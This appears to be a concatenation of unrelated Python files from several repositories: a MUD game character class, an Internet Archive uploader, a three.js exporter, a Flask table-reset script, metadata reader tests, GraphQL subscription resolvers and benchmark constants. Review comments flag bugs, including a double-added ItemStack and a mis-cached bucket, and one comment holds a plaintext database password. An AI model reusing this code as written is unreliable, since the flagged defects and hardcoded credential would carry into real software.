        # whitespace-only msg reaches _command_parser, where
        # args[0] raises IndexError -- confirm upstream input is stripped.
        if msg:
            self._parser(msg)
    def update(self):
        """periodically called method that updates character state"""
        print(f"[{self}] received update")
    def spawn(self, spawn_location):
        """Send a greeting to the character and put them into a
        name-selection mode.
        [spawn_location]: where the character should spawn after a name
        is submitted.
        """
        self.message(f"Welcome to our SwampyMud! You are a {type(self)}")
        self.message(f"What should we call you?")
        # set player location to spawn_location, but do not MOVE them
        # thus, player will not be available to attack
        self.location = spawn_location
        self._parser = self._join_parser
    def despawn(self):
        """method executed when a player dies"""
        self.message("You died.")
        if self.location is not None:
            self.location.message(f"{self} died.", exclude={self})
            try:
                self.location.characters.remove(self)
            except ValueError:
                # character was not in the location's list; nothing to do
                pass
        self.location = None
        self._parser = self._dead_parser
    # default user-input parsers
    def _join_parser(self, new_name: str):
        """Parser for a newly joined player, used for selecting a valid
        name"""
        if len(new_name) < 2:
            self.message("Names must have at least 2 characters.")
            return
        if not new_name.isalnum():
            self.message("Names must be alphanumeric.")
            return
        # TODO: perform some kind of check to prevent players
        # from having the same name?
        self._name = new_name
        # move the player to the actual location they should be in
        loc = self.location
        self.location = None
        self.set_location(loc)
        self._parser = self._command_parser
    def _command_parser(self, line: str):
        """The default parser for a player. Parses [line] as a command
        invocation: first word is the command name, remaining words
        are passed through as arguments."""
        # command is always the first word
        args = line.split()
        cmd_name = args[0]
        if not cmd_name in self.cmd_dict:
            self.message("Command \'%s\' not recognized." % cmd_name)
            return
        cmd = self.cmd_dict[cmd_name]
        cmd(args)
    def _dead_parser(self, line: str):
        """Parser used when a character has died"""
        self.message("You have died. Reconnect to this server to start"
                     " as a new character.")
    # string-formatting methods
    def __repr__(self):
        """return a representation of Character"""
        if self._name is None:
            return f"{type(self).__name__}()"
        return f"{type(self).__name__}(name={self})"
    def __str__(self):
        """return the Character's name"""
        if self._name:
            return self._name
        return "[nameless character]"
    def view(self):
        """return a longer, user-focused depiction of Character"""
        if self._name is None:
            return f"A nameless {type(self)}"
        return f"{self._name} the {type(self)}"
    #location manipulation methods
    def set_location(self, new_location):
        """sets location, updating the previous and new locations as
        necessary and gathering commands from any entities in the
        location
        """
        try:
            self.location.characters.remove(self)
            # remove commands from all the entities
            # in the current location
            for entity in self.location.entities:
                entity.on_exit(self)
                entity.remove_cmds(self)
        except AttributeError:
            # location was none
            pass
        self.location = new_location
        self.location.add_char(self)
        # add commands from all the entities
        # in the current locations
        for entity in new_location.entities:
            entity.on_enter(self)
            entity.add_cmds(self)
    #inventory/item related methods
    def add_item(self, item, amt=1):
        """add [item] to player's inventory"""
        # if the item is an ItemStack, unpack it first
        # NOTE(review): this branch does not return/else, so an
        # ItemStack is added twice (once unpacked, once as the stack
        # object on the next line) -- looks like a missing 'else';
        # confirm intended behavior before changing.
        if isinstance(item, inv.ItemStack):
            self.inv.add_item(item.copy(), item.amount)
        self.inv.add_item(item, amt)
    def equip(self, item, from_inv=True):
        """place [item] in this player's equip dict
        [item]: item to Equip
        [from_inv]: if True, [item] should be removed from inventory
        first. If item is not found in inventory, the command fails.
        if False, [item] is not removed from inventory and will not
        be returned to inventory upon unequip.
        """
        # duck test that the item is even equippable
        try:
            target = item.target
        except AttributeError:
            self.message(f"{item} cannot be equipped.")
            return
        if target in self.equip_dict:
            # if from_inv is true, remove item from inventory first
            # this avoids duplication
            if from_inv:
                try:
                    self.inv.remove_item(item)
                # item not found
                except KeyError:
                    self.message(f"Cannot equip {item}-"
                                 "not found in inventory.")
                    return
            # check for an already equipped weapon, unequip it
            if self.equip_dict[target] is not None:
                self.unequip(target)
            item.on_equip(self)
            item.add_cmds(self)
            # stored as (item, from_inv) so unequip knows whether to
            # return the item to the inventory
            self.equip_dict[item.target] = item, from_inv
        # class doesn't have an equip target for this item, cannot equip
        else:
            self.message(f"Cannot equip item {item} to {target}.")
            return
    def unequip(self, target):
        """updates this character's equip_dict such that the [target]
        is set to None and any item at that position is unequipped
        [target]: an EquipTarget"""
        # test if anything is even equipped
        # also duck test to see if this character even has [target]
        # in its equip slots
        try:
            if self.equip_dict[target] is None:
                self.message(f"No item equipped on target {target}.")
                return
        except KeyError:
            self.message(f"{type(self)} does not possess"
                         f" equip slot '{target}'.")
            return
        equipped, from_inv = self.equip_dict[target]
        equipped.on_unequip(self)
        equipped.remove_cmds(self)
        self.equip_dict[target] = None
        # if item was from character's inventory, return it
        if from_inv:
            self.inv.add_item(equipped)
    # default commands
    @Command
    def help(self, args):
        """Show relevant help information for a particular command.
        usage: help [command]
        If no command is supplied, a list of all commands is shown.
        """
        if len(args) < 2:
            # TODO: cache this or something
            menu = self.help_menu()
            self.message(menu)
        else:
            name = args[1]
            try:
                self.message(self.cmd_dict[name].help_entry())
            except KeyError:
                self.message(f"Command '{name}' not recognized.")
    @Command
    def look(self, args):
        """Gives a description of your current location.
        usage: look
        """
        # TODO: update to allow players to 'inspect' certain objects
        self.message(self.location.view())
    @Command
    def say(self, args):
        """Send a message to all players in your current location.
        usage: say [msg]
        """
        msg = ' '.join(args[1:])
        if msg and self.location is not None:
            self.location.message(f"{self.view()}: {msg}")
    @Command
    def go(self, args):
        """Go to an accessible location.
        usage: go [exit name]
        """
        ex_name = " ".join(args[1:])
        # Manually iterating over our location's list of exits
        # Note! If writing your own method, just do
        # util.find(location, ex_name, location.Exit, char=my_char)
        # I'm only writing this to avoid a cyclic dependency.
        for ex in self.location._exit_list:
            if ex_name in ex.names:
                found_exit = ex
                break
        else:
            # loop completed without break: no matching exit
            self.message(f"No exit with name '{ex_name}'.")
            return
        if found_exit.interact.permits(self):
            old_location = self.location
            new_location = found_exit.destination
            new_location.message(f"{self} entered.")
            self.set_location(new_location)
            # TODO: only show the exit if a character can see it?
            old_location.message(f"{self} left through exit "
                                 f"'{ex_name}'.")
        else:
            if found_exit.perceive.permits(self):
                self.message(f"Exit '{ex_name}' is inaccessible to you.")
            # if the char can't see or interact with the exit,
            # we lie to them and pretend like it doesn't exist
            else:
                self.message(f"No exit with name '{ex_name}'.")
    @Command.with_traits(name="equip")
    def cmd_equip(self, args):
        """Equip an equippable item from your inventory."""
        if len(args) < 2:
            self.message("Provide an item to equip.")
            return
        item_name = " ".join(args[1::]).lower()
        found_items = util.find(self.inv, name=item_name)
        if len(found_items) == 1:
            self.equip(found_items[0][0])
        elif len(found_items) > 1:
            #TODO handle ambiguity
            self.message(f"Ambigious item name. Results={found_items}")
        else:
            self.message(f"Could not find item '{item_name}'.")
    @Command.with_traits(name="unequip")
    def cmd_unequip(self, args):
        """Unequip an equipped item.
        Usage: unequip [item]"""
        if len(args) < 2:
            self.message("Provide an item to equip.")
            return
        item_name = " ".join(args[1::]).lower()
        # search through the items in the equip_dict
        found_items = []
        for _, equip_data in self.equip_dict.items():
            if equip_data is None:
                continue
            item, _ = equip_data
            if str(item).lower() == item_name:
                found_items.append(item)
        if len(found_items) == 1:
            self.unequip(found_items[0].target)
        elif len(found_items) > 1:
            #TODO handle ambiguity
            self.message(f"Ambigious item name. Results={found_items}")
        else:
            self.message(f"Could not find equipped item '{item_name}'.")
    @Command
    def pickup(self, args):
        """Pick up item from the environment."""
        if len(args) < 2:
            self.message("Provide an item to pick up.")
            return
        item_name = " ".join(args[1::]).lower()
        # TODO: find a way to provide type=Item
        found_items = util.find(self.location, name=item_name)
        if len(found_items) == 1:
            item = found_items[0][0]
            # transfer item from the location's inventory to ours
            self.location.inv.remove_item(item)
            self.inv.add_item(item)
        elif len(found_items) > 1:
            #TODO handle ambiguity
            self.message(f"Ambigious item name. Results={found_items}")
        else:
            self.message(f"Could not find item '{item_name}' to pick up.")
    @Command
    def drop(self, args):
        """Drop an item into the environment"""
        if len(args) < 2:
            self.message("Provide an item to drop.")
            return
        item_name = " ".join(args[1:]).lower()
        found_items = util.find(self.inv, name=item_name)
        if len(found_items) == 1:
            item = found_items[0][0]
            # transfer item from our inventory to the location's
            self.inv.remove_item(item)
            self.location.inv.add_item(item)
        elif len(found_items) > 1:
            #TODO handle ambiguity
            self.message(f"Ambigious item name. Results={found_items}")
        else:
            self.message(f"Could not find item '{item_name}' to drop.")
    @Command.with_traits(name="inv")
    def cmd_inv(self, args):
        """Show your inventory.
        usage: inv"""
        # create a string representation of the equipped items
        equipped = []
        for target, item in self.equip_dict.items():
            if item is None:
                equipped.append(f"{target}: none")
            else:
                # item is an (equipped_item, from_inv) pair
                equipped.append(f"{target}: {item[0]}")
        equipped.sort()
        self.message("\n".join(equipped))
        inv_msg = self.inv.readable()
        # only send a message if inv has items
        if inv_msg:
            self.message(inv_msg)
    @Command.with_traits(name="use")
    def cmd_use(self, args):
        """ Use an item.
        usage: use [item] [options for item]
        Options may vary per item.
        """
        # TODO: allow players to use accessible items in location?
        if len(args) < 2:
            self.message("Please specify an item.")
            return
        item_name = args[1]
        found_items = util.find(self.inv, name=item_name)
        if len(found_items) == 1:
            item = found_items[0][0]
            # take the item out while it is being used
            self.inv.remove_item(item)
            item.on_use(self, args[2:])
            # replace the item
            self.inv.add_item(item)
        elif len(found_items) > 1:
            #TODO handle ambiguity
            self.message(f"Ambigious item name. Results={found_items}")
        else:
            self.message(f"Could not find item '{item_name}' to use.")
    # miscellaneous methods
    def help_menu(self) -> str:
        """build a help menu string, grouping this character's commands
        under their source CharacterClass labels"""
        sources = {}
        # walk the mro, to get the list of CharacterClasses in order
        for cls in reversed(type(self).__mro__):
            if isinstance(cls, CharacterClass):
                sources[cls.command_label] = []
        for name, cmd in self.cmd_dict.items():
            try:
                sources[cmd.label].append(name)
            except KeyError:
                # label not from a CharacterClass (e.g. entity commands)
                sources[cmd.label] = [name]
        # unpack the dictionary in reverse order
        output = []
        while sources:
            source, names = sources.popitem()
            output.append(f"---{source}---")
            output.append(" ".join(names))
        return "\n".join(output)
    # serialization-related methods
    @property
    def symbol(self):
        """return a unique symbol for this Character"""
        # failsafe to ensure that Character always has a symbol
        # even if someone forgets to set self._symbol in the __init__
        if not hasattr(self, "_symbol"):
            symbol = "{}#{}".format(type(self).__name__,
                                    util.to_base(id(self), 62))
            setattr(self, "_symbol", symbol)
        return self._symbol
    @classmethod
    def load(cls, data):
        """create a Character from serialized [data]"""
        name = data["name"] if "name" in data else None
        return cls(name)
    def post_load(self, data):
        """hook called after all game objects are loaded; base
        Character needs no post-load fixup"""
        pass
    def save(self):
        """return a pythonic representation of this Character"""
        return {"_type": type(self), "name": self._name}
    def children(self):
        """return any game objects owned by this Character
        (base Character owns none)"""
        return []
        #TODO: handle items here
# --- morphium/ia.py ---
import os
import logging
import boto
from boto.s3.connection import OrdinaryCallingFormat
import mimetypes
from datetime import datetime
from morphium.util import env, TAG_LATEST
log = logging.getLogger(__name__)
config = {}
class InternetArchive(object):
    """A scraper archive on the internet archive. This is called when a
    scraper has generated a file which needs to be backed up to a
    bucket."""
    def __init__(self, item=None, prefix=None):
        """[item]: IA item (bucket) name; falls back to env 'ia_item'.
        [prefix]: optional key prefix for all uploads."""
        # tag each upload batch with today's UTC date, e.g. '2024-01-31'
        self.tag = datetime.utcnow().date().isoformat()
        self.item = item or env('ia_item')
        self.prefix = prefix
        self.access_key = env('ia_access_key_id')
        self.secret_key = env('ia_secret_access_key')
    @property
    def bucket(self):
        """lazily connect to s3.us.archive.org and return the bucket
        for self.item; returns None when config is incomplete"""
        if not hasattr(self, '_bucket'):
            # all three settings are required for an upload
            # (local name 'config' shadows the module-level config dict)
            config = self.item is not None
            config = config and self.access_key is not None
            config = config and self.secret_key is not None
            if not config:
                log.warning("No Internet Archive config, skipping upload.")
                # NOTE(review): sets self._client, not self._bucket, so
                # the failure result is never cached and this warning
                # repeats on every access -- confirm whether '_bucket'
                # was intended here.
                self._client = None
                return None
            conn = boto.connect_s3(self.access_key, self.secret_key,
                                   host='s3.us.archive.org',
                                   is_secure=False,
                                   calling_format=OrdinaryCallingFormat())
            # create the item on first use
            if not conn.lookup(self.item, validate=False):
                conn.create_bucket(self.item)
            self._bucket = conn.get_bucket(self.item)
        return self._bucket
    def upload_file(self, source_path, file_name=None, mime_type=None):
        """Upload a file to the given bucket.
        The file is stored twice: under today's date tag and under the
        'latest' tag. Returns the public URL of the last key written
        (the 'latest' copy), or None when not configured."""
        if self.bucket is None:
            return
        if file_name is None:
            file_name = os.path.basename(source_path)
        if mime_type is None:
            # guess from the file extension, with a generic fallback
            mime_type, _ = mimetypes.guess_type(file_name)
            mime_type = mime_type or 'application/octet-stream'
        date_name = os.path.join(self.tag, file_name)
        copy_name = os.path.join(TAG_LATEST, file_name)
        for key_name in (date_name, copy_name):
            if self.prefix is not None:
                key_name = os.path.join(self.prefix, key_name)
            log.info("Uploading [%s]: %s", self.item, key_name)
            key = self.bucket.get_key(key_name)
            if key is None:
                key = self.bucket.new_key(key_name)
            key.content_type = mime_type
            key.set_contents_from_filename(source_path,
                                           policy='public-read')
        # 'key' is the last key written in the loop above
        return key.generate_url(84600, query_auth=False)
# --- ThreeJson.py ---
#
# Adapted from https://github.com/dcowden/cadquery/blob/master/cadquery/freecad_impl/exporters.py
# Objects that represent
# three.js JSON object notation
# https://github.com/mrdoob/three.js/wiki/JSON-Model-format-3
#
# %-format template for a three.js JSON Model (format version 3).
# Placeholders: nVertices/nFaces (ints), vertices/faces (list reprs).
JSON_TEMPLATE = """\
{
    "metadata" :
    {
        "formatVersion" : 3,
        "generatedBy" : "ParametricParts",
        "vertices" : %(nVertices)d,
        "faces" : %(nFaces)d,
        "normals" : 0,
        "colors" : 0,
        "uvs" : 0,
        "materials" : 1,
        "morphTargets" : 0
    },
    "scale" : 1.0,
    "materials": [ {
        "DbgColor" : 15658734,
        "DbgIndex" : 0,
        "DbgName" : "Material",
        "colorAmbient" : [0.0, 0.0, 0.0],
        "colorDiffuse" : [0.6400000190734865, 0.10179081114814892, 0.126246120426746],
        "colorSpecular" : [0.5, 0.5, 0.5],
        "shading" : "Lambert",
        "specularCoef" : 50,
        "transparency" : 1.0,
        "vertexColors" : false
    }],
    "vertices": %(vertices)s,
    "morphTargets": [],
    "normals": [],
    "colors": [],
    "uvs": [[]],
    "faces": %(faces)s
}
"""


def tessToJson(vert, face, nvert, nface):
    """Render a tessellation as a three.js JSON model string.

    [vert]: flat list of vertex coordinates.
    [face]: list of face indices; each triangle's indices must be led
        by a 0 type-marker to be valid in the three.js format. Spec:
        https://github.com/mrdoob/three.js/wiki/JSON-Model-format-3
    [nvert], [nface]: vertex/face counts for the metadata section.

    Note: relies on Python's list repr (e.g. "[1.0, 2.0]") being valid
    JSON, which holds for flat numeric lists.
    """
    # (original final line was corrupted by fused dataset residue and a
    # stray trailing semicolon; this is the repaired form)
    substitutions = {
        "vertices": str(vert),
        "faces": str(face),
        "nVertices": nvert,
        "nFaces": nface,
    }
    return JSON_TEMPLATE % substitutions
orm.py | macTracyHuang/cs50w_project1 | 0 | 12797424 | import os
from flask import Flask
from application import get_app
from models import *
from flask_session import Session
# Flask application and server-side session store.
app = get_app()
session = Session(app)

# Tell Flask what SQLAlchemy database to use.
# app.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://postgres:a1234567@localhost"
# app.config["SQLALCHEMY_DATABASE_URI"] = os.getenv("DATABASE_URL")
# app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False

# Link the Flask app with the database (no Flask app is actually being run yet).
db.init_app(app)
def main():
    """(Re)create all database tables from the definitions in `models`.

    WARNING: drops every existing table first, destroying all stored data,
    then recreates the schema, including the flask-session table.
    """
    # The original had this summary as a bare (unquoted) statement, which
    # is a syntax error; it is now a proper docstring.
    db.drop_all()
    db.create_all()
    session.app.session_interface.db.create_all()
if __name__ == "__main__":
    # Allows for command line interaction with Flask application;
    # main() needs an application context for db/session access.
    with app.app_context():
        main()
| 1.539063 | 2 |
tests/reader/test_iso19139.py | cehbrecht/md-ingestion | 4 | 12797432 | <reponame>cehbrecht/md-ingestion<gh_stars>1-10
import os
import pytest
from mdingestion.reader import ISO19139Reader
from tests.common import TESTDATA_DIR
def test_envidat_iso19139():
    """Smoke-test ISO19139 parsing of an EnviDat sample record."""
    xml_path = os.path.join(
        TESTDATA_DIR, 'envidat-iso19139', 'SET_1', 'xml', 'bbox_2ea750c6-4354-5f0a-9b67-2275d922d06f.xml')
    doc = ISO19139Reader().read(xml_path)
    assert 'Number of avalanche fatalities' in doc.title[0]
    assert 'Avalanche Warning Service SLF' in doc.creator[0]
    assert 'WSL Institute for Snow' in doc.publisher[0]
    assert doc.publication_year == '2018'
    assert doc.keywords == ['AVALANCHE ACCIDENT STATISTICS', 'AVALANCHE ACCIDENTS', 'AVALANCHE FATALITIES']
    # Pending expectations kept from the original for reference:
    # assert "POLYGON ((45.81802 10.49203, 45.81802 47.80838, 5.95587 47.80838, 5.95587 10.49203, 45.81802 10.49203))" == doc.spatial_coverage  # noqa
    # assert "{'type': 'Polygon', 'coordinates': (((45.81802, 10.49203), (45.81802, 47.80838), (5.95587, 47.80838), (5.95587, 10.49203), (45.81802, 10.49203)),)}" == doc.spatial  # noqa
def test_boundingbox():
    """The reader condenses the ISO bounding-box decimals into one string."""
    xml_path = os.path.join(
        TESTDATA_DIR, 'deims', 'raw', '8708dd68-f413-5414-80fb-da439a4224f9.xml')
    reader = ISO19139Reader()
    doc = reader.read(xml_path)
    # Source record bounds (gmd:EX_GeographicBoundingBox):
    #   west  = 34.611499754704   east  = 35.343095815055
    #   south = 29.491402811787   north = 30.968572510749
    assert doc.spatial_coverage == '(34.611W, 29.491S, 35.343E, 30.969N)'
@pytest.mark.xfail(reason='missing in reader')
def test_iso19139_temporal_coverage():
    """Temporal coverage is not extracted by the reader yet (expected failure)."""
    xml_path = os.path.join(
        TESTDATA_DIR, 'envidat-iso19139', 'SET_1', 'xml', 'bbox_2ea750c6-4354-5f0a-9b67-2275d922d06f.xml')
    doc = ISO19139Reader().read(xml_path)
    # Pending spatial expectations kept from the original for reference:
    # assert "POLYGON ((45.81802 10.49203, 45.81802 47.80838, 5.95587 47.80838, 5.95587 10.49203, 45.81802 10.49203))" == doc.spatial_coverage  # noqa
    # assert "{'type': 'Polygon', 'coordinates': (((45.81802, 10.49203), (45.81802, 47.80838), (5.95587, 47.80838), (5.95587, 10.49203), (45.81802, 10.49203)),)}" == doc.spatial  # noqa
    assert doc.temporal_coverage_begin_date == '2018-12-31T00:00:00Z'
    assert doc.temporal_coverage_end_date == '2018-12-31T00:00:00Z'
| 1.289063 | 1 |
backend/handlers/graphql/utils/subscription.py | al-indigo/vmemperor | 0 | 12797440 | <filename>backend/handlers/graphql/utils/subscription.py
import asyncio
from dataclasses import dataclass
from typing import Dict, Type
import graphene
from graphene import ObjectType
from graphene.types.resolver import dict_resolver
from graphql import ResolveInfo
from rethinkdb import RethinkDB
from rethinkdb.errors import ReqlOpFailedError
from rx import Observable
from enum import Enum
import constants.re as re
from authentication import BasicAuthenticator
from connman import ReDBConnection
from handlers.graphql.types.deleted import Deleted
from handlers.graphql.utils.querybuilder.changefeedbuilder import ChangefeedBuilder
from handlers.graphql.utils.querybuilder.get_fields import get_fields
from utils.user import user_entities
from xenadapter.xenobject import XenObject
from xenadapter.aclxenobject import ACLXenObject
# Kind of update delivered on a subscription; the string values mirror the
# RethinkDB changefeed change types. (Comment instead of a docstring: a
# docstring on a graphene.Enum would become the GraphQL type description.)
class Change(graphene.Enum):
    Initial = 'initial'
    Add = 'add'
    Remove = 'remove'
    Change = 'change'
def str_to_changetype(s: str) -> Change:
    """Map a RethinkDB change-type string to the corresponding Change member."""
    mapping = {
        'initial': Change.Initial,
        'add': Change.Add,
        'remove': Change.Remove,
        'change': Change.Change,
    }
    if s in mapping:
        return mapping[s]
    raise ValueError(f"No such ChangeType: {s}")
@dataclass
class TaskCounter:
    """A changefeed task paired with a subscriber reference count.

    The task is cancelled by the caller when ``count`` drops to zero.
    """
    task: asyncio.Task
    # Number of subscribers sharing this task. The original declared this
    # as an unannotated class attribute, so it was not a dataclass field
    # (excluded from __init__/__repr__/__eq__); annotating it makes it a
    # proper field while keeping TaskCounter(task=...) calls working.
    count: int = 1
async def create_single_changefeeds(queue: asyncio.Queue, info: ResolveInfo, user_authenticator : BasicAuthenticator, xenobject_type: Type[XenObject], with_initials : bool, filter_function=None):
    """Watch the refs of *xenobject_type*'s table and maintain one
    ChangefeedBuilder task per live object, forwarding their updates to
    *queue*.

    Non-admin users are restricted to the rows visible through the
    per-user ``<table>_user`` index. Each per-object task is refcounted
    in ``tasks`` (a ref can appear more than once); when the last
    reference is removed the task is cancelled and a synthetic
    ``remove`` event carrying only the ref is queued.

    :param queue: destination for change events
    :param info: GraphQL resolve info, forwarded to ChangefeedBuilder
    :param user_authenticator: used to decide admin vs per-user table view
    :param xenobject_type: XenObject subclass whose table is watched
    :param with_initials: when False, initial states are suppressed
    :param filter_function: optional async predicate (ref, conn) -> bool
        deciding whether a newly seen ref is included
    """
    async with ReDBConnection().get_async_connection() as conn:
        # ref -> TaskCounter for the currently watched objects.
        tasks: Dict[str, TaskCounter] = {}
        try:
            if not user_authenticator or user_authenticator.is_admin() or not issubclass(xenobject_type, ACLXenObject):
                table = re.db.table(xenobject_type.db_table_name)
            else:
                # Restrict to rows owned by one of the user's entities.
                table = re.db.table(f'{xenobject_type.db_table_name}_user').get_all(*[entity for entity in user_entities(user_authenticator)], index='userid')
            changes = await table.pluck('ref').changes(include_types=True, include_initial=True).run(conn)
            while True:
                try:
                    change = await changes.next()
                except ReqlOpFailedError:
                    # Changefeed was closed underneath us (e.g. table dropped).
                    return
                if not change:
                    break
                if change['type'] == 'remove':
                    value = change['old_val']
                    task_counter = tasks[value['ref']]
                    task_counter.count -= 1
                    if task_counter.count == 0:
                        # Last reference gone: stop the per-object feed and
                        # tell subscribers the object was removed.
                        if not task_counter.task.done():
                            task_counter.task.cancel()
                        await queue.put({
                            'type': 'remove',
                            'old_val':
                                {
                                    'ref' : value['ref']
                                }
                        })
                        del tasks[value['ref']]
                elif change['type'] == 'change':
                    # A ref should never change in place; log and ignore.
                    print(f"Ref change?: {change}")
                    continue
                else:
                    # 'initial' or 'add': start (or re-count) a per-object feed.
                    value = change['new_val']
                    if filter_function and not (await filter_function(value['ref'], conn)):
                        continue
                    builder = ChangefeedBuilder(id=value['ref'],
                                                info=info,
                                                queue=queue,
                                                additional_string=None,
                                                select_subfield=['value'],  # { value : {...} <-- this is what we need in info
                                                status=change['type'],
                                                ignore_initials=not with_initials)
                    if not value['ref'] in tasks:
                        tasks[value['ref']] = TaskCounter(task=asyncio.create_task(builder.put_values_in_queue()))
                    else:
                        tasks[value['ref']].count += 1
        except asyncio.CancelledError:
            # Subscription ended: tear down every per-object task.
            for task_counter in tasks.values():
                task_counter.task.cancel()
            return
        except Exception as e:
            import sentry_sdk
            sentry_sdk.capture_exception(e)
            return
def MakeSubscriptionWithChangeType(_class : type) -> type:
    """
    Create a subscription type with change tracking. If an object is deleted and it's a XenObject, only its ref is returned
    :param _class: GraphQL type to track changes on
    :return: a graphene ObjectType named '<_class>sSubscription' with a
        required `change_type` field (Change enum) and a required `value`
        field whose type is the union '<_class>OrDeleted' (_class OR Deleted)
    """
    # Meta for the union: a payload is either the tracked type or Deleted.
    class Meta:
        types = (_class, Deleted, )
    change_type = type(f'{_class.__name__}OrDeleted', (graphene.Union, ), {
        "Meta": Meta,
    })
    # Second, unrelated Meta (deliberately shadows the first) for the
    # wrapper ObjectType: resolvers receive plain dicts.
    class Meta:
        default_resolver = dict_resolver
    return type(f'{_class.__name__}sSubscription',
                (ObjectType, ),
                {
                    'change_type': graphene.Field(Change, required=True, description="Change type"),
                    'value': graphene.Field(change_type, required=True),
                    'Meta': Meta
                })
def MakeSubscription(_class : type) -> type:
    """Return the subscription payload type for a single-item subscription.

    Used with resolve_item_by_pkey-style resolvers, where one particular
    item is watched. Historically this wrapped *_class* in a dedicated
    ObjectType; the current contract is the identity — the item type
    itself serves as the subscription payload.
    """
    return _class
def resolve_xen_item_by_key(key_name:str = 'ref'):
    """
    Returns an asynchronous function that resolves every change of the item
    with the primary key taken from the resolver argument named *key_name*.
    If the item is deleted or does not exist, null is yielded in its place.
    :param key_name: name of the resolver argument holding the primary key
    :return: resolver returning an Observable. Works with asyncio
    """
    def resolve_item(root, info, **args) -> Observable:
        '''
        Create a field with MakeSubscription(type)
        :param root:
        :param info:
        :param args: must contain *key_name* with the item's primary key
        :return:
        '''
        async def iterable_to_item():
            # No key supplied: emit a single null and finish.
            key = args.get(key_name, None)
            if not key:
                yield None
                return
            builder = ChangefeedBuilder(key, info)
            async for change in builder.yield_values():
                if not change:
                    break
                # Deleted (or never-existing) items are reported as null.
                if change['type'] == 'remove' or change['new_val'] is None:
                    yield None
                    continue
                else:
                    value = change['new_val']
                    yield value

        return Observable.from_future(iterable_to_item())

    return resolve_item
def resolve_all_xen_items_changes(item_class: type, filter_function=None):
    """
    Returns an asynchronous function that resolves every change in RethinkDB table
    :param item_class: GraphQL object type that has same shape as a table
    :param filter_function: this function is given a ref of potential subscription candidate (0th arg) and an asyncio connection to work with DB (1st arg).
    This function should return true or false answering whether we should include this item in our subscription
    resolve_vdis is usage example.
    Bear in mind that this function is called only once when a new item is added, and with all initial items
    :return:
    """
    def resolve_items(root, info : ResolveInfo, with_initials : bool, **kwargs) -> Observable:
        '''
        Returns subscription updates with the following shape:
        {
            changeType: one of Initial, Add, Mod, Remove
            value: of type item_class
        }
        Create a field with MakeSubscriptionWithChangeType(type)
        :param info:
        :param with_initials: Supply subscription with initial values (default: False). Use True, when a Subscription is not used as a backer for Query
        '''
        async def iterable_to_items():
            # Work out the concrete XenObject type from the requested fields.
            fields_for_return_type = get_fields(info, ['value'])
            xenobject_type = fields_for_return_type['_xenobject_type_']
            queue = asyncio.Queue()
            authenticator = info.context.user_authenticator
            # Background task maintaining one changefeed per item; its
            # events arrive on `queue`.
            creator_task = asyncio.create_task(create_single_changefeeds(queue, info, authenticator, xenobject_type, with_initials, filter_function))
            try:
                while True:
                    change = await queue.get()
                    # On removal only the old row (its ref) is available.
                    if change['type'] == 'remove':
                        value = change['old_val']
                        value['__typename'] = 'Deleted'
                    else:
                        value = change['new_val']
                        value['__typename'] = item_class.__name__
                    yield dict(change_type=str_to_changetype(change['type']),
                               value=value)
            except asyncio.CancelledError:
                # Subscriber went away: stop the changefeed factory too.
                creator_task.cancel()
                return

        return Observable.from_future(iterable_to_items())

    return resolve_items
def resolve_item_by_key(item_class: type, table_name : str, key_name:str = 'ref'):
    """
    Returns an asynchronous function that resolves every change in RethinkDB table with item with said primary key
    If item is deleted or does not exist, returns null in place of an item
    :param item_class: A GraphQL object type that has the same shape as a table
    :param table_name: name of the RethinkDB table to retrieve updates from
    :param key_name: name of the resolver argument holding the primary key
    :return: function that returns Observable. Works with asyncio
    """
    def resolve_item(root, info, **args) -> Observable:
        '''
        Create a field with MakeSubscription(type)
        :param root:
        :param info:
        :param args: must contain *key_name* with the item's primary key
        :return:
        '''
        async def iterable_to_item():
            async with ReDBConnection().get_async_connection() as conn:
                # No key supplied: emit a single null and finish.
                key = args.get(key_name, None)
                if not key:
                    yield None
                    return
                table = re.db.table(table_name)
                # Only the fields declared on item_class are pulled.
                changes = await table.get_all(key) \
                    .pluck(*item_class._meta.fields)\
                    .changes(include_types=True, include_initial=True).run(conn)
                while True:
                    change = await changes.next()
                    if not change:
                        break
                    # Deleted (or never-existing) items are reported as null.
                    if change['type'] == 'remove' or change['new_val'] is None:
                        yield None
                        continue
                    else:
                        value = change['new_val']
                        yield item_class(**value)

        return Observable.from_future(iterable_to_item())

    return resolve_item
def resolve_all_items_changes(item_class: type, table_name : str):
    """
    Returns an asynchronous function that resolves every change in RethinkDB table
    :param item_class: GraphQL object type that has same shape as a table
    :param table_name: name of the RethinkDB table to watch
    :return: resolver returning an Observable
    """
    # Build the wrapper type once. The original re-invoked
    # MakeSubscriptionWithChangeType(item_class) inside the per-event loop,
    # constructing (and re-registering) the same graphene types for every
    # single change event.
    subscription_type = MakeSubscriptionWithChangeType(item_class)

    def resolve_items(root, info, with_initials: bool) -> Observable:
        '''
        Returns subscription updates with the following shape:
        {
            changeType: one of Initial, Add, Mod, Remove
            value: of type item_class
        }
        Create a field with MakeSubscriptionWithChangeType(type)
        :param info:
        :param with_initials: when True, the current table contents are
            emitted first as Initial changes
        :return:
        '''
        async def iterable_to_items():
            async with ReDBConnection().get_async_connection() as conn:
                table = re.db.table(table_name)
                changes = await table.pluck(*item_class._meta.fields.keys()).changes(include_types=True, include_initial=with_initials).run(conn)
                while True:
                    change = await changes.next()
                    if not change:
                        break
                    # On removal only the old row is available.
                    if change['type'] == 'remove':
                        value = change['old_val']
                    else:
                        value = change['new_val']
                    value = item_class(**value)
                    yield subscription_type(change_type=str_to_changetype(change['type']),
                                            value=value)

        return Observable.from_future(iterable_to_items())

    return resolve_items
| 1.570313 | 2 |
traffic_engineering/benchmarks/benchmark_helpers.py | stanford-futuredata/POP | 15 | 12797448 | <gh_stars>10-100
from collections import defaultdict
from glob import iglob
import argparse
import os
import sys
sys.path.append("..")
from lib.partitioning import FMPartitioning, SpectralClustering
# Topology-Zoo problem instances used across all benchmarks.
PROBLEM_NAMES = [
    "GtsCe.graphml",
    "UsCarrier.graphml",
    "Cogentco.graphml",
    "Colt.graphml",
    "TataNld.graphml",
    "Deltacom.graphml",
    "DialtelecomCz.graphml",
    "Kdl.graphml",
]
# Traffic-matrix generation models.
TM_MODELS = [
    "uniform",
    "gravity",
    "bimodal",
    "poisson-high-intra",
    "poisson-high-inter",
]
# Demand scale factors applied to each traffic matrix.
SCALE_FACTORS = [1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0, 128.0]

# (num_paths, edge_disjoint, dist_metric) for the path-formulation baseline.
